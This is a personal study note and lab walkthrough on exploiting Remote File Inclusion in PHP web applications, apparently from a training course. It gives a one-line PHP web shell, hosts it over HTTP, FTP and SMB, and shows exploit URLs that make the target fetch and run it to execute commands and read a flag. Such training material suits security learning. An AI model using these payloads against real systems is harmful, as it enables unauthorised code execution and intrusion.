6 - RFI - JA Smith

# Intro - RFI allows us to: - Enumerate local-only ports and web apps for SSRF - Gain remote code execution by including a malicious script hosted on our Kali machine |**Function**|**Read Content**|**Execute**|**Remote URL**| |---|:-:|:-:|:-:| |**PHP**|||| |`include()`/`include_once()`|✅|✅|✅| |`file_get_contents()`|✅|❌|✅| |**Java**|||| |`import`|✅|✅|✅| |**.NET**|||| |`@Html.RemotePartial()`|✅|❌|✅| |`include`|✅|✅|✅| # Verify RFI ## Method A - Check whether the `allow_url_include` setting is enabled - Pull the `config.php` source code (or similar page) as a base64 string and review for the above setting ```bash echo '<base64_string>' | base64 -d | grep allow_url_include ``` ## Method B - The above method may not always be reliable, as even if this setting is enabled, the vulnerable function may not allow remote URL inclusion to begin with - Thus, a more reliable way to determine whether an LFI vulnerability is also vulnerable to RFI is to try to include a URL and see if we can get its content. - At first, we should start by trying to include a local URL to ensure our attempt does not get blocked by a FW or the like ```url http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.php ``` ![[images/Pasted image 20251219191513.png]] - In the above example, the `index.php` page is included in the vulnerable section (i.e. History Description), so the page is indeed vulnerable to RFI - Furthermore, the `index.php` page did not get included as source code text but got executed and rendered as PHP, so the vulnerable function also allows PHP execution, which may allow us to execute code if we include a malicious PHP script that we host on our machine # RCE with RFI ## HTTP - First, create a malicious script in the language of the web app ```bash echo '<?php system($_GET["cmd"]); ?>' > shell.php ``` - Second, host script via HTTP ```bash python3 -m http.server <LISTENING_PORT> ``` - Finally, include our local shell through RFI vuln and specify a command to execute ```url http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id ``` ![[images/Pasted image 20251219192236.png]] ## FTP - Starting from step two, host script via FTP ```shell-session sudo python -m pyftpdlib -p 21 ``` - Finally, include our local shell through RFI vuln and specify a command to execute ```url http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id ``` ![[images/Pasted image 20251219192415.png]] - We can also use `curl` to achieve the same end ```bash curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id' ``` ## SMB - IMPORTANT: If the vulnerable web application is hosted on a Windows server (which we can tell from the server version in the HTTP response headers), then we do not need the `allow_url_include` setting to be enabled for RFI exploitation, as we can utilize the SMB protocol for the remote file inclusion - This is because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path - This technique is most likely to work if we were on the same network, as accessing remote SMB servers over the internet may be disabled by default, depending on the Windows server config - Starting from step two, host script via SMB ```bash impacket-smbserver -smb2support share $(pwd) ``` - Finally, include our local shell through RFI vuln and specify a command to execute ```url http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami ``` ![[images/Pasted image 20251219192824.png]] # Exercise - Ping test ![[images/Pasted image 20251219193136.png]] - nmap scans ![[images/Pasted image 20251219193151.png]] - Visit page ![[images/Pasted image 20251219193246.png]] - Try RFI on `localhost` - Definitely get odd feedback in history section, which must be vulnerable to RFI ![[images/Pasted image 20251219193436.png]] - Create a webshell script ```bash echo '<?php system($_GET["cmd"]); ?>' > shell.php ``` ![[images/Pasted image 20251219193601.png]] - Host `shell.php` via HTTP ```bash python3 -m http.server 80 ``` ![[images/Pasted image 20251219193651.png]] - Try the below URL ```url http://10.129.138.33/index.php?language=http://10.10.15.249:80/shell.php?cmd=whoami ``` - We got a hit on the HTTP server![[images/Pasted image 20251219193902.png]] - The output on the page seems borked though ![[images/Pasted image 20251219193907.png]] - Similar issues with other commands ## FTP - Host `shell.php` via ftp ![[images/Pasted image 20251219194358.png]] - Use below URL ```url http://10.129.138.33/index.php?language=ftp://10.10.15.249:21/shell.php?cmd=id ``` - The request hit the ftp server ![[images/Pasted image 20251219194450.png]] - But, we are getting similar errors![[images/Pasted image 20251219194456.png]] # MISSING & - We are used a `?` before the specified command, whereas we should be using an `&` - Try http version again - Start http server - Use below URL ```url http://10.129.138.33/index.php?language=http://10.10.15.249:8080/shell.php&cmd=id ``` - Now we are cooking ![[images/Pasted image 20251219195112.png]] - List contents of `/` directory with below URL ```url http://10.129.138.33/index.php?language=http://10.10.15.249:8080/shell.php&cmd=ls%20/ ``` ![[images/Pasted image 20251219195315.png]] - `cat` the flag within `/exercise` ```url http://10.129.138.33/index.php?language=http://10.10.15.249:8080/shell.php&cmd=cat+/exercise/flag.txt ``` ![[images/Pasted image 20251219195456.png]]